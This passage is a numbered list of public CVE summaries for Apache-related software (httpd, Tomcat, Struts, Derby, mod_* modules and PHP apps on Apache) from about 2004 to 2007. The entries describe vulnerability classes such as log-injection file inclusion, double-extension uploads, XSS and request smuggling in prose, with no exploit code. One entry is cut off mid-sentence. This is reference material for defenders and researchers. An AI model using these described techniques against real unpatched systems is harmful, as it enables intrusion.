13651| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
13652| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
13653| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
13654| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
13655| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
13656| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13657| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
13658| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
13659| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
13660| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
13661| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
13662| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
13663| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
13664| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
13665| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
13666| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
13667| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
13668| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
13669| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
13670| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13671| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
13672| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
13673| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
13674| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
13675| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
13676| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
13677| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
13678| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
13679| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13680| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
13681| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
13682| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
13683| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
13684| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
13685| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13686| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
13687| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13688| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
13689| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
13690| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13691| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
13692| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
13693| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
13694| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
13695| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
13696| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
13697| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
13698| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
13699| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13700| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
13701| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
13702| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
13703| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
13704| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
13705| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
13706| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
13707| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
13708| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
13709| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
13710| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
13711| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
13712| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
13713| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
13714| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
13715| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
13716| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
13717| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
13718| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
13719| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
13720| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
13721| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
13722| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
13723| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
13724| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
13725| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
13726| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
13727| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
13728| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
13729| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
13730| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
13731| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
13732| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
13733| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
13734| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
13735| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
13736| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
13737| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
13738| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
13739| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
13740| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
13741| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
13742| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
13743| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
13744| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
13745| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
13746| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
13747| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
13748| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13749| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
13750| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
13751| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
13752| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
13753| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
13754| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
13755| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
13756| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
13757| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
13758| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
13759| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
13760| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
13761| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
13762| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
13763| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
13764| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13765| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13766| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
13767| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
13768| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
13769| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
13770| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
13771| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
13772| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
13773| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
13774| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
